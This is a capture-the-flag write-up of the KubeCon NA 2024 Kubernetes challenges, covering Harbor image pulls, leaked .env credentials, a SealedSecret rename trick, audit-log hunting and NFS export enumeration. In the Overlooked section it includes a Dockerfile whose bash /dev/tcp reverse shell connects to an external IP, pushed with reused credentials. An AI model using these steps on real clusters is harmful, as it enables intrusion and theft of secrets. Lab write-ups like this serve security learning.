KubeCon + CloudNativeCon North America 2024 CTF

Hello! This is my writeup of the wonderful challenges the ControlPlane team put together at KubeCon this year. It was a ton of fun, and I encourage folks of all experience levels to give it a go.

All you need is a laptop, CNCF Slack, a web browser, and some basic Linux tools (ssh and docker).

For a beautiful blog writeup with screenshots and color coding, go here! https://www.skybound.link/2024/11/kubecon-na-2024-ctf-writeup/

ctf{SUBMIT_THIS}



The very first flag is a gimme to help folks get familiar with CTFd. It is named "test flag", sits under the category flag_ctf{SUBMIT_THIS} (which is also the answer), and is worth 5 points. (BOOM! If you need hints to get started, here are your points!!!)

Overlooked

Overlooked Flag 1

SSH into the bastion. Upon login, we get a hint that we can forward ports with the command sudo ssh -L 5432:localhost:5432 -F simulator_config -f -N -i simulator_rsa bastion, along with some potentially useful hostnames (including vapor-ops.harbor.kubesim.tech).

Set up /etc/hosts so these hostnames resolve to localhost.

```
$ sudo vim /etc/hosts
##
# Host Database
#
# localhost is used to configure the loopback interface
# when the system is booting. Do not change this entry.
##
127.0.0.1 vapor-app.kubesim.tech
127.0.0.1 vapor-ops.kubesim.tech
127.0.0.1 vapor-ops.harbor.kubesim.tech
```

The first flag is pretty neat. I’m on macOS (arm64) using Podman and ran into a couple of snags along the way. We can browse Harbor FULLY UNAUTHENTICATED. By typing single characters such as a into the search bar, two projects appeared (library, the default, and vapor). Inside vapor is a repository called vapor-app.

Browsing to the repository, we get the image digest and can look at the Docker layers. Two interesting files are copied into the image: flag.txt and .env. I need to snag the image.

Podman would NOT pull from the registry unauthenticated, because it insists on hitting /v2/ on the remote server, which is denied. crane, on the other hand, can pull the image into a tarball that Podman then loads.

```
# THIS FAILS CONSISTENTLY
podman pull --tls-verify=false --disable-content-trust vapor-ops.harbor.kubesim.tech:80/vapor/vapor-app@sha256:103ae8db1ec7f41f2abaddacc8d329a686cb40171a294f6f96179bf1f84071b8

# Pull into a tarball with crane, then load that same file into Podman
crane pull --insecure vapor-ops.harbor.kubesim.tech:80/vapor/vapor-app@sha256:103ae8db1ec7f41f2abaddacc8d329a686cb40171a294f6f96179bf1f84071b8 crane.tar
podman load -i crane.tar
```

Guess what: the image is built for amd64. Time to spin up an EC2 instance, repeat the same steps there, and get the flag.

```
$ cat flag.txt
flag_ctf{UNRAVELLING_LAYERS_REVEALS_OVERLOOKED_CONFIG}
```
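Strictly speaking, we don’t need to run an amd64 container just to read a file out of it. Here is a minimal Python sketch, assuming the docker-save style layout that crane pull writes by default (a top-level manifest.json listing the layer tarballs from bottom to top). It walks the layers in order so later layers win, and it ignores whiteout files (deletions) for brevity, so treat it as a convenience rather than a faithful image unpacker. The function name find_in_image_tar is my own.

```python
import io
import json
import posixpath
import tarfile
from typing import Dict


def find_in_image_tar(image_tar: str, basename: str) -> Dict[str, bytes]:
    """Map every file named `basename` in the image to its final contents.

    Assumes a docker-save style tarball: a top-level manifest.json whose
    first entry lists the layer tarballs from bottom to top. Whiteout files
    (deletions in later layers) are ignored to keep the sketch short.
    """
    results: Dict[str, bytes] = {}
    with tarfile.open(image_tar) as image:
        manifest = json.load(image.extractfile("manifest.json"))
        for layer_name in manifest[0]["Layers"]:
            layer_bytes = image.extractfile(layer_name).read()
            # mode "r:*" transparently handles plain and gzip-compressed layers.
            with tarfile.open(fileobj=io.BytesIO(layer_bytes), mode="r:*") as layer:
                for member in layer.getmembers():
                    if not member.isfile():
                        continue
                    path = posixpath.normpath(member.name).lstrip("/")
                    if posixpath.basename(path) == basename:
                        # Later (higher) layers overwrite earlier ones.
                        results[path] = layer.extractfile(member).read()
    return results
```

For example, find_in_image_tar("crane.tar", "flag.txt") returns every path named flag.txt mapped to its bytes, and the same call with ".env" covers the next flag, all without caring which CPU architecture the image targets.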

Overlooked Flag 2

Continuing from the previous step, next I want .env:

```
cat .env
DB_HOST=localhost
DB_PORT=5432
DB_USER=vapor
DB_PASSWORD=Access4Clouds
DB_NAME=signups
SSL_MODE=disable
FLAG=flag_ctf{MITRE_ATT&CK_T1078.003}
```

Boom, flag two is flag_ctf{MITRE_ATT&CK_T1078.003}

Overlooked Flag 3

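The hint is in the previous flag: flag_ctf{MITRE_ATT&CK_T1078.003}. MITRE ATT&CK technique T1078.003 is Valid Accounts: Local Accounts, i.e. abusing credentials that already exist.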

Initially I went down the path of connecting to the database, which was not the intended route for this challenge.

Instead, we can reuse the credentials to log in to Harbor as a project administrator of the vapor project.

YOU KNOW WHAT THIS MEANS!!! Reverse shell time baby!

Since I have an EC2 instance up and running, I simply run netcat on its public IP as a listener for a reverse shell to connect back to. Why am I excited? With write access to Harbor, we can build and push a new image (say, with the latest tag) and see whether we get a reverse shell when the deployment’s pod restarts on it.

As it turns out, there was a background script running every 5 or 10 seconds, comparing the latest sha256 digest in Harbor with the one the pod is currently using. If the digests don’t match, the deployment’s pod is killed and its replacement pulls our new malicious image.
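I never saw the watcher script itself, so the following is only a hypothetical Python sketch of the comparison it seems to perform: ask the registry which digest the latest tag points at (a HEAD request to /v2/<repo>/manifests/<tag>, which registries answer with a Docker-Content-Digest header) and compare it with the digest at the end of the pod’s image ID. All function names are mine, the request is built but never sent, and authentication against Harbor is left out.

```python
import urllib.request
from typing import Callable, Mapping

# Manifest media types a client commonly advertises so the registry resolves
# the tag to the manifest (or index) it points at.
MANIFEST_ACCEPT = ", ".join([
    "application/vnd.oci.image.index.v1+json",
    "application/vnd.oci.image.manifest.v1+json",
    "application/vnd.docker.distribution.manifest.list.v2+json",
    "application/vnd.docker.distribution.manifest.v2+json",
])


def manifest_head_request(registry: str, repo: str, tag: str) -> urllib.request.Request:
    """HEAD /v2/<repo>/manifests/<tag>, as in the OCI distribution API."""
    url = f"{registry.rstrip('/')}/v2/{repo}/manifests/{tag}"
    return urllib.request.Request(url, method="HEAD", headers={"Accept": MANIFEST_ACCEPT})


def digest_from_headers(headers: Mapping[str, str]) -> str:
    """Registries report the manifest digest in the Docker-Content-Digest header."""
    return headers["Docker-Content-Digest"]


def digest_from_image_id(image_id: str) -> str:
    """Pod image IDs look like 'docker.io/repo@sha256:...'; keep only the digest."""
    return image_id.rsplit("@", 1)[-1]


def should_restart(running_image_id: str, fetch_latest_digest: Callable[[], str]) -> bool:
    """Hypothetical watcher check: restart when the tag now points at a new digest."""
    return fetch_latest_digest() != digest_from_image_id(running_image_id)
```

To actually query Harbor you would pass the request to urllib.request.urlopen and hand response.headers to digest_from_headers; keeping the fetch behind a callable makes the comparison easy to reason about (and test) on its own.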

```
$ docker login vapor-ops.harbor.kubesim.tech
# Use our credentials from Flag 2

$ vim Dockerfile
FROM debian:latest
LABEL maintainer="Lars Lühr and contributors <https://github.com/ayeks/reverse_shell>"
# Connect back to the listener on the EC2 instance
RUN echo "bash -i >& /dev/tcp/44.204.42.3/6666 0>&1" > reverse_shell.sh
CMD ["bash", "./reverse_shell.sh"]

$ docker build . -t vapor-ops.harbor.kubesim.tech:80/vapor/vapor-app:latest
$ docker push vapor-ops.harbor.kubesim.tech:80/vapor/vapor-app:latest
```

Output was not captured due to extreme excitement. Running a straight-up ls / in the shell, we see a directory that isn’t standard on Linux: /host. A surprise volume is mounted into our pod as part of the deployment!!!!!!

```
$ nc -lv 6666   # TCP listener: bash's /dev/tcp connects over TCP, so no -u (UDP)
> cat /host/flag.txt
flag_ctf{SMALL_MISTAKES_CAN_HAVE_BIG_IMPACTS}
```

Hush Hush

Vulnerable secrets!!!

Hush Hush Flag 1

Let’s see what we can do.

```
root@entrypoint:~/.kube/cache/http# kubectl get ns
NAME              STATUS   AGE
default           Active   77m
kube-node-lease   Active   77m
kube-public       Active   77m
kube-system       Active   77m
lockbox           Active   76m
```

Cool, cool. What can we do in the default namespace?

```
root@entrypoint:~# kubectl auth can-i --list
Resources                                       Non-Resource URLs                      Resource Names   Verbs
selfsubjectreviews.authentication.k8s.io        []                                     []               [create]
selfsubjectaccessreviews.authorization.k8s.io   []                                     []               [create]
selfsubjectrulesreviews.authorization.k8s.io    []                                     []               [create]
sealedsecrets.bitnami.com                       []                                     []               [get list watch create update]
namespaces                                      []                                     []               [get list]
secrets                                         []                                     []               [get list]
                                                [/.well-known/openid-configuration/]   []               [get]
                                                [/.well-known/openid-configuration]    []               [get]
                                                [/api/*]                               []               [get]
                                                [/api]                                 []               [get]
                                                [/apis/*]                              []               [get]
                                                [/apis]                                []               [get]
                                                [/healthz]                             []               [get]
                                                [/healthz]                             []               [get]
                                                [/livez]                               []               [get]
                                                [/livez]                               []               [get]
                                                [/openapi/*]                           []               [get]
                                                [/openapi]                             []               [get]
                                                [/openid/v1/jwks/]                     []               [get]
                                                [/openid/v1/jwks]                      []               [get]
                                                [/readyz]                              []               [get]
                                                [/readyz]                              []               [get]
                                                [/version/]                            []               [get]
                                                [/version/]                            []               [get]
                                                [/version]                             []               [get]
                                                [/version]                             []               [get]
```

Borrowing a trick from other writeups of previous years, we can list our permissions in every namespace. Boom, nice enumeration:

```
root@entrypoint:~# kubectl get ns | awk '{print $1}' | grep -v NAME | while read ns ; do echo $ns; kubectl -n $ns auth can-i --list | grep -vE '^ ' | grep -v selfsubject; echo; done
default
Resources                   Non-Resource URLs   Resource Names   Verbs
sealedsecrets.bitnami.com   []                  []               [get list watch create update]
namespaces                  []                  []               [get list]
secrets                     []                  []               [get list]

kube-node-lease
Resources    Non-Resource URLs   Resource Names   Verbs
namespaces   []                  []               [get list]

kube-public
Resources    Non-Resource URLs   Resource Names   Verbs
namespaces   []                  []               [get list]

kube-system
Resources        Non-Resource URLs   Resource Names               Verbs
services/proxy   []                  [http:sealed-secrets:]       [create get]
services/proxy   []                  [http:sealed-secrets:http]   [create get]
services/proxy   []                  [sealed-secrets]             [create get]
namespaces       []                  []                           [get list]
services         []                  [sealed-secrets]             [get]

lockbox
Resources                   Non-Resource URLs   Resource Names   Verbs
sealedsecrets.bitnami.com   []                  []               [get list watch create update delete]
namespaces                  []                  []               [get list]
secrets                     []                  [test-secret]    [get list]
```

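The interesting bits are in lockbox: we can create, update, and delete SealedSecrets, but we can only read a single Secret, test-secret. Time to read up on Sealed Secrets. How does the Bitnami controller populate these?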

As it turns out, the process works like this: a secret is sealed (encrypted) with the Sealed Secrets controller’s public key, typically using kubeseal, and only the controller holds the matching private key. The SealedSecret’s metadata tells the controller which namespace and name the resulting Secret should have. For each SealedSecret, the controller decrypts the payload with its private key and creates a Secret in the SAME NAMESPACE with the SAME NAME as the SealedSecret.

You may look at this and go, wow, this is wildly insecure! Don’t get too excited, friend: all secrets need to be decrypted at some point for our applications to consume them. The value of a secrets management tool is managing secrets at scale, across deployments, namespaces, and clusters. This is okay.

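What’s not okay is that we can kubectl get the SealedSecret, change its name to test-secret, and kubectl apply -f (or create -f) it to make a SealedSecret whose decrypted Secret we are allowed to read. Because the controller watches every SealedSecret and creates the matching Secret in the same namespace, secret/test-secret was created just a few seconds later. The rename only works because of how these SealedSecrets were sealed: the resulting Secrets carry the sealedsecrets.bitnami.com/cluster-wide and sealedsecrets.bitnami.com/namespace-wide annotations. Under the default strict scope, the name and namespace are bound into the ciphertext, so a renamed copy would fail to decrypt.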
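To see why the sealing scope decides whether a rename works, here is a small Python model. It is based on my reading of the sealed-secrets project: the payload key is wrapped with the controller’s RSA public key using OAEP, and the OAEP label depends on the scope (namespace/name for strict, namespace for namespace-wide, empty for cluster-wide). Nothing here performs real encryption and the function names are mine; it only shows which label a renamed copy would have to match.

```python
def encryption_label(namespace: str, name: str, scope: str = "strict") -> bytes:
    """Label bound into a SealedSecret's ciphertext for each sealing scope."""
    if scope == "strict":
        return f"{namespace}/{name}".encode()
    if scope == "namespace-wide":
        return namespace.encode()
    if scope == "cluster-wide":
        return b""
    raise ValueError(f"unknown sealing scope: {scope!r}")


def rename_still_decrypts(namespace: str, old_name: str, new_name: str, scope: str) -> bool:
    """A renamed copy decrypts only if its label equals the one used when sealing."""
    return encryption_label(namespace, old_name, scope) == encryption_label(namespace, new_name, scope)
```

With strict scope, rename_still_decrypts("lockbox", "flag-1", "test-secret", "strict") is False, while the cluster-wide and namespace-wide cases used by flag-1 and flag-2 come out True, which matches what we observed.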

- There is a resource SealedSecret/flag-1. When it was created, the Bitnami controller decrypted the secret and created a new resource, Secret/flag-1, for our deployment in the namespace.
- We export SealedSecret/flag-1 to YAML and rename the resource to test-secret, which the permissions above say we can read once it exists as secret/test-secret.
- Create the SealedSecret/test-secret resource.
- The controller detects the new SealedSecret resource, decrypts the value, and creates a plain-text secret at secret/test-secret.
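The export-and-rename step can also be scripted. As a minimal sketch, assuming you export JSON instead of YAML (kubectl -n lockbox get sealedsecret flag-1 -o json), the hypothetical helper below renames the object and strips fields the API server fills in itself; kubectl create rejects a manifest that still carries metadata.resourceVersion. The exact field list is my assumption of what is safe to drop, not something taken from the challenge.

```python
import copy

# Fields populated by the API server or the controller rather than by us.
SERVER_FIELDS = ("uid", "resourceVersion", "creationTimestamp", "generation",
                 "managedFields", "ownerReferences", "selfLink")


def rename_sealed_secret(obj: dict, new_name: str) -> dict:
    """Return a copy of a SealedSecret object renamed to `new_name`."""
    out = copy.deepcopy(obj)  # never mutate the exported original
    meta = out["metadata"]
    for field in SERVER_FIELDS:
        meta.pop(field, None)
    meta.get("annotations", {}).pop("kubectl.kubernetes.io/last-applied-configuration", None)
    meta["name"] = new_name
    # kubeseal may also record the name in the Secret template; keep it consistent.
    template_meta = out.get("spec", {}).get("template", {}).get("metadata")
    if isinstance(template_meta, dict) and "name" in template_meta:
        template_meta["name"] = new_name
    out.pop("status", None)
    return out
```

Write json.dumps(rename_sealed_secret(obj, "test-secret"), indent=2) to a file and kubectl create -f it, just like the hand-edited YAML. The encrypted data is left untouched, which is the whole point.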

```
root@entrypoint:~# kubectl -n lockbox get sealedsecret flag-1 -o yaml > flag-1.yml
root@entrypoint:~# vim flag-1.yml
root@entrypoint:~# kubectl create -f flag-1.yml
sealedsecret.bitnami.com/test-secret created
```

```
root@entrypoint:~# kubectl -n lockbox get sealedsecrets
NAME          STATUS   SYNCED   AGE
flag-1                 True     100m
flag-2                 True     100m
test-secret            True     10s
root@entrypoint:~# kubectl -n lockbox get secret test-secret
NAME          TYPE     DATA   AGE
test-secret   Opaque   1      21s
```

```
root@entrypoint:~# kubectl -n lockbox get secret test-secret -o yaml
apiVersion: v1
data:
  flag: ZmxhZ19jdGZ7a3ViZV9iZWNhdXNlX2l0c19lbmNyeXB0ZWRfZG9lc250X21lYW5faXRfc2hvdWxkX2JlX3B1YmxpY30=
kind: Secret
metadata:
  annotations:
    sealedsecrets.bitnami.com/cluster-wide: "true"
    sealedsecrets.bitnami.com/managed: "true"
  creationTimestamp: "2024-11-14T18:57:47Z"
  name: test-secret
  namespace: lockbox
  ownerReferences:
  - apiVersion: bitnami.com/v1alpha1
    controller: true
    kind: SealedSecret
    name: test-secret
    uid: 0133b128-0771-4e73-b8c7-3e6ac7a3d044
  resourceVersion: "9894"
  uid: bb11e695-b7b8-4ee9-928e-09248432a454
type: Opaque
```

```
root@entrypoint:~# echo "ZmxhZ19jdGZ7a3ViZV9iZWNhdXNlX2l0c19lbmNyeXB0ZWRfZG9lc250X21lYW5faXRfc2hvdWxkX2JlX3B1YmxpY30=" | base64 -d
flag_ctf{kube_because_its_encrypted_doesnt_mean_it_should_be_public}
```
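Copying one value into base64 -d works fine for a single key. For Secrets with several keys, here is a small Python sketch that decodes everything under .data of kubectl get secret -o json output; the function name is mine, and it assumes every value is UTF-8 text.

```python
import base64
from typing import Dict


def decode_secret_data(secret: dict) -> Dict[str, str]:
    """Base64-decode every value under .data of a Secret object."""
    return {key: base64.b64decode(value).decode("utf-8")
            for key, value in secret.get("data", {}).items()}
```

kubectl can also do the extraction itself: kubectl -n lockbox get secret test-secret -o jsonpath='{.data.flag}' | base64 -d.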

Hush Hush Flag 2

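Repeat!!! The test-secret SealedSecret from flag 1 has to go first (our role in lockbox includes delete), which is why apply reports created below.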

```
root@entrypoint:~# kubectl -n lockbox get sealedsecret flag-2 -o yaml > flag-2.yml
root@entrypoint:~# vim flag-2.yml
root@entrypoint:~# kubectl apply -f flag-2.yml
sealedsecret.bitnami.com/test-secret created
```

```
root@entrypoint:~# kubectl -n lockbox get secret test-secret
NAME          TYPE     DATA   AGE
test-secret   Opaque   1      11s
root@entrypoint:~# kubectl -n lockbox get secret test-secret -o yaml
apiVersion: v1
data:
  flag: ZmxhZ19jdGZ7dGhpc19vbmVfd2FzX2FfYml0X21vcmVfaW52b2x2ZWRfd2VsbF9kb25lfQ==
kind: Secret
metadata:
  annotations:
    sealedsecrets.bitnami.com/managed: "true"
    sealedsecrets.bitnami.com/namespace-wide: "true"
  creationTimestamp: "2024-11-14T19:01:05Z"
  name: test-secret
  namespace: lockbox
  ownerReferences:
  - apiVersion: bitnami.com/v1alpha1
    controller: true
    kind: SealedSecret
    name: test-secret
    uid: 82ff0947-3799-49ef-9fe6-05bb40335a41
  resourceVersion: "10201"
  uid: 53e8922e-6cac-4444-a498-e3f5078c9fe2
type: Opaque
```

```
root@entrypoint:~# echo "ZmxhZ19jdGZ7dGhpc19vbmVfd2FzX2FfYml0X21vcmVfaW52b2x2ZWRfd2VsbF9kb25lfQ==" | base64 -d
flag_ctf{this_one_was_a_bit_more_involved_well_done}
```

Pirates

Introduction:

We think dread pirate ᶜᵃᵖᵗᵃⁱⁿ Hλ$ħ𝔍Ⱥ¢k has managed to compromise our cluster. Someone has been trying to steal secrets from the cluster, but we aren't sure how or where. Check the logs in /var/log/audit/kube to find out where he got in.

Once you've found the workload, identify what the captain's crew were targeting, and find any other security issues in the cluster.

(Your first flag is the name of the compromised namespace)

Pirates Flag 1

I started by going straight through the logs.

```
cat /var/log/audit/kube/* | jq
```

There is a TON of data in here, and it looks like an active attacker. One event stands out:

```
kube-apiserver.log:{"kind":"Event","apiVersion":"audit.k8s.io/v1","level":"Metadata","auditID":"de8659ca-2419-4c4c-b702-c67a1e9ee55d","stage":"ResponseComplete","requestURI":"/api/v1/namespaces/e88wmxbmdfkvp2h945sgpnk7viy1f9la/secrets?limit=500","verb":"list","user":{"username":"system:serviceaccount:e88wmxbmdfkvp2h945sgpnk7viy1f9la:captain-hashjack","uid":"50db1f4c-8c9e-483e-b0da-c75f9aeaa50e","groups":["system:serviceaccounts","system:serviceaccounts:e88wmxbmdfkvp2h945sgpnk7viy1f9la","system:authenticated"],"extra":{"authentication.kubernetes.io/credential-id":["JTI=31c61b5a-90fa-4838-ac1e-4f6e6af61819"],"authentication.kubernetes.io/node-name":["node-2"],"authentication.kubernetes.io/node-uid":["5ef2e569-ccaf-4a29-8c20-b0b31b4411c9"],"authentication.kubernetes.io/pod-name":["attacker-pod-8786f4c9-2bgrr"],"authentication.kubernetes.io/pod-uid":["7c54f767-5f8c-4447-ac43-030ab4160580"]}},"sourceIPs":["10.0.191.91"],"userAgent":"kubectl/v1.28.0 (linux/amd64) kubernetes/855e7c4","objectRef":{"resource":"secrets","namespace":"e88wmxbmdfkvp2h945sgpnk7viy1f9la","apiVersion":"v1"},"responseStatus":{"metadata":{},"status":"Failure","message":"secrets is forbidden: User \"system:serviceaccount:e88wmxbmdfkvp2h945sgpnk7viy1f9la:captain-hashjack\" cannot list resource \"secrets\" in API group \"\" in the namespace \"e88wmxbmdfkvp2h945sgpnk7viy1f9la\"","reason":"Forbidden","details":{"kind":"secrets"},"code":403},"requestReceivedTimestamp":"2024-11-14T20:57:20.936881Z","stageTimestamp":"2024-11-14T20:57:20.937622Z","annotations":{"authorization.k8s.io/decision":"forbid","authorization.k8s.io/reason":""}}
```

Decomposing this message, we obtain two very important pieces of information:

namespace: e88wmxbmdfkvp2h945sgpnk7viy1f9la

service account: captain-hashjack

Therefore! If the flag is the namespace, the flag is flag_ctf{e88wmxbmdfkvp2h945sgpnk7viy1f9la}.
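Scrolling through jq output works, but this needle can also be pulled out programmatically. A minimal sketch, assuming one JSON audit event per line (what the API server’s log backend writes), optionally preceded by a grep-style file: prefix like the line above. The function name and the filter (forbidden secrets requests made by service accounts) are my own choices.

```python
import json
from typing import Iterable, Iterator, Tuple

SA_PREFIX = "system:serviceaccount:"


def forbidden_secret_access(lines: Iterable[str]) -> Iterator[Tuple[str, str, str]]:
    """Yield (namespace, service account, pod) for each forbidden secrets request."""
    for line in lines:
        start = line.find("{")  # skip any "file:" prefix added by grep
        if start == -1:
            continue
        try:
            event = json.loads(line[start:])
        except json.JSONDecodeError:
            continue
        if event.get("objectRef", {}).get("resource") != "secrets":
            continue
        if event.get("responseStatus", {}).get("code") != 403:
            continue
        user = event.get("user", {})
        username = user.get("username", "")
        if not username.startswith(SA_PREFIX):
            continue
        namespace, _, service_account = username[len(SA_PREFIX):].partition(":")
        pods = user.get("extra", {}).get("authentication.kubernetes.io/pod-name", ["?"])
        yield namespace, service_account, pods[0]
```

Feed it the lines of every file under /var/log/audit/kube (for example by opening each path from glob.glob("/var/log/audit/kube/*")) and collect the results into a set to get each distinct offender once.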

Pirates Flag 2

What can we do in the namespace?

```
root@entrypoint-686fc7bc94-gh5tb:/var/log/audit/kube# kubectl -n e88wmxbmdfkvp2h945sgpnk7viy1f9la auth can-i --list
Resources                                       Non-Resource URLs                      Resource Names   Verbs
pods/exec                                       []                                     []               [create]
selfsubjectreviews.authentication.k8s.io        []                                     []               [create]
selfsubjectaccessreviews.authorization.k8s.io   []                                     []               [create]
selfsubjectrulesreviews.authorization.k8s.io    []                                     []               [create]
nodes                                           []                                     []               [get list]
pods/log                                        []                                     []               [get list]
pods                                            []                                     []               [get list]
deployments.apps                                []                                     []               [get list]
                                                [/.well-known/openid-configuration/]   []               [get]
                                                [/.well-known/openid-configuration]    []               [get]
                                                [/api/*]                               []               [get]
                                                [/api]                                 []               [get]
                                                [/apis/*]                              []               [get]
                                                [/apis]                                []               [get]
                                                [/healthz]                             []               [get]
                                                [/healthz]                             []               [get]
                                                [/livez]                               []               [get]
                                                [/livez]                               []               [get]
                                                [/openapi/*]                           []               [get]
                                                [/openapi]                             []               [get]
                                                [/openid/v1/jwks/]                     []               [get]
                                                [/openid/v1/jwks]                      []               [get]
                                                [/readyz]                              []               [get]
                                                [/readyz]                              []               [get]
                                                [/version/]                            []               [get]
                                                [/version/]                            []               [get]
                                                [/version]                             []               [get]
                                                [/version]                             []               [get]
```

We can get some info about this pod!

```
root@entrypoint-686fc7bc94-gh5tb:/var/log/audit/kube# kubectl -n e88wmxbmdfkvp2h945sgpnk7viy1f9la describe pod/attacker-pod-8786f4c9-2bgrr
Name:             attacker-pod-8786f4c9-2bgrr
Namespace:        e88wmxbmdfkvp2h945sgpnk7viy1f9la
Priority:         0
Service Account:  captain-hashjack
Node:             node-2/10.0.191.91
Start Time:       Thu, 14 Nov 2024 19:17:06 +0000
Labels:           pod-template-hash=8786f4c9
                  run=attacker-pod
Annotations:      cni.projectcalico.org/containerID: d7e6208167b9ecafa72848c91684bcb931a46c4364a8f2272e2a6fbbf8764127
                  cni.projectcalico.org/podIP: 192.168.247.2/32
                  cni.projectcalico.org/podIPs: 192.168.247.2/32
Status:           Running
IP:               192.168.247.2
IPs:
  IP:           192.168.247.2
Controlled By:  ReplicaSet/attacker-pod-8786f4c9
Containers:
  attacker-pod:
    Container ID:  containerd://4ded51bac6a06642dbde120d4c18b1ced259e9c5c8460a0257c03854f3781338
    Image:         controlplaneoffsec/kubectl:latest
    Image ID:      docker.io/controlplaneoffsec/kubectl@sha256:c25f795914ba5f857397370c29075325e1f4aac75b4746cb577cbd16dde65bdf
    Port:          <none>
    Host Port:     <none>
    Command:
      /bin/bash
      -c
      --
    Args:
      while true; echo 'Trying to steal sensitive data'; kubectl -s flag.secretlocation.svc.cluster.local get --raw /; echo ''; do kubectl get secrets; echo ''; sleep 3; done;
    State:          Running
      Started:      Thu, 14 Nov 2024 19:17:13 +0000
    Ready:          True
    Restart Count:  0
    Environment:    <none>
    Mounts:
      /var/run/secrets/kubernetes.io/serviceaccount from kube-api-access-4glpv (ro)
Conditions:
  Type                        Status
  PodReadyToStartContainers   True
  Initialized                 True
  Ready                       True
  ContainersReady             True
  PodScheduled                True
Volumes:
  kube-api-access-4glpv:
    Type:                    Projected (a volume that contains injected data from multiple sources)
    TokenExpirationSeconds:  3607
    ConfigMapName:           kube-root-ca.crt
    ConfigMapOptional:       <nil>
    DownwardAPI:             true
QoS Class:                   BestEffort
Node-Selectors:              <none>
Tolerations:                 node.kubernetes.io/not-ready:NoExecute op=Exists for 300s
                             node.kubernetes.io/unreachable:NoExecute op=Exists for 300s
Events:                      <none>
```

The container’s command is very interesting: what is flag.secretlocation.svc.cluster.local? It is not a Secret. Kubernetes DNS names Services as <service>.<namespace>.svc.cluster.local, so this points at a Service called flag in the secretlocation namespace.
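Reading these names gets easier with a tiny helper. A minimal Python sketch that splits a Service DNS name of the form <service>.<namespace>.svc.<cluster-domain>; the names ServiceRef and parse_service_dns are mine, and the function deliberately rejects anything that isn’t a Service name (pod DNS names, external hosts).

```python
from typing import NamedTuple


class ServiceRef(NamedTuple):
    service: str
    namespace: str
    cluster_domain: str


def parse_service_dns(host: str) -> ServiceRef:
    """Split <service>.<namespace>.svc.<cluster-domain> into its parts."""
    labels = host.rstrip(".").split(".")
    if len(labels) < 4 or labels[2] != "svc":
        raise ValueError(f"not a Kubernetes Service DNS name: {host}")
    return ServiceRef(labels[0], labels[1], ".".join(labels[3:]))
```

parse_service_dns("flag.secretlocation.svc.cluster.local") gives service flag, namespace secretlocation, and cluster domain cluster.local.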

```
$ kubectl -n e88wmxbmdfkvp2h945sgpnk7viy1f9la logs pod/attacker-pod-8786f4c9-2bgrr
Trying to steal sensitive data
Unable to connect to the server: dial tcp 10.98.50.49:80: i/o timeout
Error from server (Forbidden): secrets is forbidden: User "system:serviceaccount:e88wmxbmdfkvp2h945sgpnk7viy1f9la:captain-hashjack" cannot list resource "secrets" in API group "" in the namespace "e88wmxbmdfkvp2h945sgpnk7viy1f9la"
Trying to steal sensitive data
```

Can we curl it ourselves from inside the container, and what’s the error?

Weird, this times out…

```
$ kubectl -n e88wmxbmdfkvp2h945sgpnk7viy1f9la exec --stdin --tty attacker-pod-8786f4c9-2bgrr -- /bin/bash
root@attacker-pod-8786f4c9-2bgrr:~# curl http://192.168.247.3
LOL!
```

```
$ kubectl -n e88wmxbmdfkvp2h945sgpnk7viy1f9la logs attacker-pod-8786f4c9-2bgrr
Initiating a multi-threaded brute-force attack against the target's salted hash tables while leveraging a zero-day buffer overflow exploit to inject a polymorphic payload into the network's mainframe. We'll need to spoof our MAC addresses, reroute traffic through a compromised proxy, and establish a reverse shell connection through an encrypted SSH tunnel. Once inside, we can escalate privileges using a privilege escalation script hidden in a steganographic image payload and exfiltrate data via a covert DNS tunneling technique while obfuscating our footprint with recursive self-deleting scripts.
```

Some steps are missing from my notes here. Listing our permissions in the secretlocation namespace shows that we can modify a single NetworkPolicy. Boom. We add a rule allowing 0.0.0.0/0 on port 80 to the default “egress deny all” policy (tehehe), and access is granted!!!

```
$ kubectl -n e88wmxbmdfkvp2h945sgpnk7viy1f9la exec --stdin --tty attacker-pod-8786f4c9-2bgrr -- /bin/bash
root@attacker-pod-8786f4c9-2bgrr:~# curl http://192.168.247.3/robots.txt
flag_ctf{you_found_what_the_good_captain_sought}
```

Pirates Flag 3

I did not succeed at this challenge.

What directories are mounted on our bastion?

```
root@entrypoint-686fc7bc94-gh5tb:~# mount -s
...
10.0.235.109:/var/log/audit/kube on /var/log/audit/kube type nfs4 (ro,relatime,vers=4.2,rsize=524288,wsize=524288,namlen=255,hard,proto=tcp,timeo=600,retrans=2,sec=sys,clientaddr=10.0.195.50,local_lock=none,addr=10.0.235.109)
...
```

Cool, cool, cool. The audit logs are served over NFS from 10.0.235.109. Which machine is that?

```
root@entrypoint-686fc7bc94-gh5tb:~# kubectl get nodes -o wide
NAME       STATUS   ROLES           AGE     VERSION   INTERNAL-IP    EXTERNAL-IP   OS-IMAGE             KERNEL-VERSION   CONTAINER-RUNTIME
master-1   Ready    control-plane   3h24m   v1.31.2   10.0.235.109   <none>        Ubuntu 22.04.5 LTS   6.8.0-1015-aws   containerd://1.7.7
node-1     Ready    <none>          3h24m   v1.31.2   10.0.195.50    <none>        Ubuntu 22.04.5 LTS   6.8.0-1015-aws   containerd://1.7.7
node-2     Ready    <none>          3h24m   v1.31.2   10.0.191.91    <none>        Ubuntu 22.04.5 LTS   6.8.0-1015-aws   containerd://1.7.7
```

10.0.235.109 is master-1, the control-plane node. What file shares does it export?

```
root@entrypoint-686fc7bc94-gh5tb:~# showmount -e 10.0.235.109
Export list for 10.0.235.109:
/etc/kubernetes/manifests *
/var/log/audit/kube       *
```

Let’s use nmap’s nfs-ls script to list the contents of each export (run from the attacker pod):

```
(tmp) root@attacker-pod-8786f4c9-2bgrr:~# nmap -p 111 --script=nfs-ls 10.0.235.109
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-14 23:15 UTC
Nmap scan report for 10-0-235-109.kubernetes.default.svc.cluster.local (10.0.235.109)
Host is up (0.0027s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-ls: Volume /etc/kubernetes/manifests
|   access: Read Lookup Modify Extend Delete NoExecute
| PERMISSION  UID  GID  SIZE  TIME                 FILENAME
| rwxrwxr-x   0    0    4096  2024-11-14T19:14:39  .
| ??????????  ?    ?    ?     ?                    ..
| rw-r--r--   0    0    0     2024-10-22T21:18:16  .kubelet-keep
| rw-------   0    0    2539  2024-11-14T19:14:39  etcd.yaml
| rw-------   0    0    4424  2024-11-14T19:15:18  kube-apiserver.yaml
| rw-------   0    0    3279  2024-11-14T19:14:39  kube-controller-manager.yaml
| rw-------   0    0    1463  2024-11-14T19:14:39  kube-scheduler.yaml
|
|
| Volume /var/log/audit/kube
|   access: Read Lookup NoModify NoExtend NoDelete NoExecute
